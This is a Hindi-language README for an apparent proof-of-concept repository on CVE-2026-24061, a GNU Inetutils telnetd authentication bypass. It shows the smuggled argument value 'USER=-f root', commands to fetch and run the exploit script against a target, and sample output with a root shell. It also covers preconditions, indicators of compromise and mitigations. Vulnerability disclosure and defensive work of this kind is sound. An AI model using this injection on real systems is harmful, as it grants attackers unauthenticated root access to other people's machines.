
CVE-2026-24061 GNU Inetutils Telnetd प्रमाणीकरण बाईपास
CVE: CVE-2026-24061
गंभीरता: क्रिटिकल
CVSS: 9.8 (क्रिटिकल)
CWE: CWE-88 — कमांड में आर्गुमेंट डिलीमीटर का अनुचित न्यूट्रलाइज़ेशन
प्रभावित घटक: GNU Inetutils telnetd
प्रभावित संस्करण: 1.9.3 से 2.7
CVE-2026-24061 GNU Inetutils द्वारा प्रदान किए गए Telnet सर्वर कार्यान्वयन में एक क्रिटिकल प्रमाणीकरण बाईपास भेद्यता है। यह भेद्यता Telnet स्वचालित लॉगिन सक्षम होने पर क्लाइंट-नियंत्रित USER पर्यावरण चर के अपर्याप्त सत्यापन से उत्पन्न होती है। एक दुर्भावनापूर्ण मान को उपयोगकर्ता नाम के बजाय सिस्टम लॉगिन प्रोग्राम के विकल्प के रूप में व्याख्यायित किया जा सकता है। कमजोर कॉन्फ़िगरेशन के तहत, एक अनधिकृत दूरस्थ हमलावर login को -f विकल्प के साथ आमंत्रित करने और प्रमाणीकरण को बाईपास करने के लिए इस व्यवहार का दुरुपयोग कर सकता है, संभावित रूप से अनुरोधित खाते के विशेषाधिकारों के साथ एक शेल प्राप्त कर सकता है।
जब प्रभावित Telnet सेवा रूट विशेषाधिकारों के साथ चल रही हो, तो सफल शोषण के परिणामस्वरूप अनधिकृत दूरस्थ रूट एक्सेस हो सकता है।
कमजोर निष्पादन प्रवाह को इस प्रकार संक्षेपित किया जा सकता है:
Telnet क्लाइंट
│
│ USER=-f root
▼
telnetd
│
│ लॉगिन आर्गुमेंट बनाता है
▼
login -f root
│
│ प्रमाणीकरण बाईपास
▼
रूट शेल
यह समस्या Telnet की स्वचालित लॉगिन कार्यक्षमता और USER पर्यावरण चर के हैंडलिंग के बीच परस्पर क्रिया के माध्यम से ट्रिगर होती है।
हमलावर-नियंत्रित मान:
-f root
को सख्ती से उपयोगकर्ता नाम के रूप में नहीं माना जाता है। इसके बजाय, यह login का आर्गुमेंट बन सकता है, जिसके परिणामस्वरूप इसके बराबर व्यवहार होता है:
login -f root
-f विकल्प login को निर्दिष्ट उपयोगकर्ता के लिए सामान्य प्रमाणीकरण प्रक्रिया को बाईपास करने का निर्देश देता है।
रिपॉजिटरी में एक Python 3 प्रूफ ऑफ कॉन्सेप्ट शामिल है जो Telnet कनेक्शन करता है, आवश्यक प्रोटोकॉल नेगोशिएशन को संभालता है, दुर्भावनापूर्ण USER मान इंजेक्ट करता है, और परिणामी सत्र को सत्यापित करता है।
git clone https://github.com/Ish3ng0m4/CVE-2026-24061-Telnetd.git
cd CVE-2026-24061-Telnetd
chmod +x poc.py
python3 poc.py <TARGET> <PORT>
wget https://raw.githubusercontent.com/Ish3ng0m4/CVE-2026-24061-Telnetd/main/poc.py
PoC को निष्पादन योग्य बनाएं:
chmod +x poc.py
लक्ष्य पता और Telnet पोर्ट प्रदान करके इसे चलाएं:
python3 poc.py <TARGET> <PORT>
python3 poc.py 127.0.0.1 23
सफल शोषण
CVE-2026-24061 - GNU Inetutils telnetd Auth Bypass
[*] लक्ष्य: 127.0.0.1:23
[+] कनेक्टेड
[*] USER=-f root इंजेक्ट किया गया
[+] VULNERABLE
फिर PoC एक इंटरैक्टिव सत्र प्रदान करता है।
id
uid=0(root) gid=0(root) groups=0(root)
यह पुष्टि करता है कि Telnet प्रमाणीकरण तंत्र को बाईपास कर दिया गया था और परिणामी सत्र में रूट विशेषाधिकार हैं।
शोषण निम्नलिखित कार्य करता है:
लक्ष्य Telnet सेवा से कनेक्ट होता है। आवश्यक Telnet प्रोटोकॉल नेगोशिएशन करता है। शोषण के लिए आवश्यक स्वचालित-लॉगिन व्यवहार सक्षम करता है। दुर्भावनापूर्ण USER=-f root मान प्रदान करता है। कमजोर telnetd कार्यान्वयन को हेरफेर किए गए मान को login तक पहुंचाने की अनुमति देता है। परिणामी सत्र प्राप्त करता है। ऑपरेटर को एक इंटरैक्टिव टर्मिनल प्रदान करता है।
PoC कमजोर प्रमाणीकरण पथ के लिए क्रेडेंशियल पर निर्भर नहीं करता है।
शोषण लक्ष्य कॉन्फ़िगरेशन और telnetd तथा सिस्टम के लॉगिन कार्यान्वयन के बीच परस्पर क्रिया पर निर्भर है।
प्राथमिक शर्तें हैं:
प्रभावित संस्करण सीमा के भीतर GNU Inetutils telnetd।
हमलावर के लिए सुलभ Telnet सेवा।
स्वचालित लॉगिन कार्यक्षमता सक्षम या उपलब्ध।
USER पर्यावरण चर की कमजोर हैंडलिंग।
इंजेक्ट किए गए विकल्प की व्याख्या करने में सक्षम एक संगत लॉगिन कार्यान्वयन।
नतीजतन, अकेले प्रभावित Inetutils संस्करण की उपस्थिति को शोषण क्षमता के प्रमाण के रूप में नहीं माना जाना चाहिए। वितरण पैच और सेवा कॉन्फ़िगरेशन पर भी विचार किया जाना चाहिए।
CVE-2026-24061 एक कमजोर सिस्टम को पूरी तरह से समझौता कर सकता है।
telnetd जिन विशेषाधिकारों के तहत संचालित होता है, उसके आधार पर शोषण प्रदान कर सकता है:
प्रमाणीकरण बाईपास
अनधिकृत स्थानीय खाता एक्सेस
दूरस्थ कमांड निष्पादन
विशेषाधिकार वृद्धि
रूट-स्तरीय एक्सेस
पूर्ण सिस्टम समझौता
सबसे अधिक जोखिम वाला परिदृश्य एक दूरस्थ रूप से सुलभ Telnet सेवा है जहां शोषण के परिणामस्वरूप रूट सत्र होता है।
शोषण के संभावित संकेतकों में शामिल हैं:
TCP/23 पर अप्रत्याशित कनेक्शन।
असामान्य उपयोगकर्ता नामों का उपयोग करके Telnet प्रमाणीकरण प्रयास।
कमांड-लाइन विकल्पों से शुरू होने वाले संदिग्ध USER मान।
अप्रत्याशित लॉगिन प्रक्रिया आर्गुमेंट।
telnetd से उत्पन्न रूट सत्र।
Telnet सेवा द्वारा उत्पन्न अप्रत्याशित प्रक्रियाएं।
नेटवर्क निगरानी को अनावश्यक रूप से Telnet सेवाओं को उजागर करने वाले सिस्टम की भी पहचान करनी चाहिए।
अनुशंसित प्रतिक्रिया Telnet को हटाना और दूरस्थ प्रशासन के लिए SSH का उपयोग करना है।
यदि Telnet को तुरंत नहीं हटाया जा सकता है:
सुरक्षा फिक्स युक्त विक्रेता-प्रदत्त संस्करण में अपग्रेड करें।
उपयुक्त ऑपरेटिंग-सिस्टम सुरक्षा अपडेट लागू करें।
TCP/23 को विश्वसनीय प्रबंधन नेटवर्क तक सीमित करें।
Telnet को अविश्वसनीय नेटवर्क के सीधे संपर्क से रोकें।
Telnet प्रमाणीकरण और प्रक्रिया गतिविधि की निगरानी करें।
क्योंकि Linux वितरण अपस्ट्रीम संस्करण संख्या बदले बिना सुरक्षा फिक्स बैकपोर्ट कर सकते हैं, प्रशासकों को केवल प्रदर्शित संस्करण पर भरोसा करने के बजाय अपने वितरण पैकेज की सुरक्षा स्थिति को सत्यापित करना चाहिए।
भेद्यता को Ubuntu 22.04.5 LTS पर चल रही एक कमजोर GNU Inetutils Telnet सेवा के विरुद्ध सफलतापूर्वक पुनरुत्पादित किया गया था।
PoC ने TCP/23 पर एक कनेक्शन स्थापित किया, इंजेक्ट किया:
USER=-f root
और एक रूट सत्र प्राप्त किया।
विशेषाधिकार सत्यापन ने लौटाया:
uid=0(root) gid=0(root) groups=0(root)
यह सुरक्षा प्रभाव की प्रत्यक्ष पुष्टि प्रदान करता है।
यह प्रूफ ऑफ कॉन्सेप्ट सुरक्षा अनुसंधान, भेद्यता सत्यापन, अधिकृत पैठ परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
केवल उन सिस्टम का परीक्षण करें जिनके लिए आपके पास स्पष्ट प्राधिकरण है।
Gabriel D. Ishengoma
आक्रामक सुरक्षा · साइबर सुरक्षा अनुसंधान · डिजिटल फोरेंसिक